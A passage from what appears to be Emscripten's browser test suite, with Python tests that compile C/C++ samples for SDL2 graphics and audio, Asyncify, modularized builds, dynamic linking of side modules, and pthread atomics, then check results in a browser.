self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
test_file('webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE',
'-s', 'RUNTIME_LINKED_LIBS=[side1.wasm,side2.wasm]'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
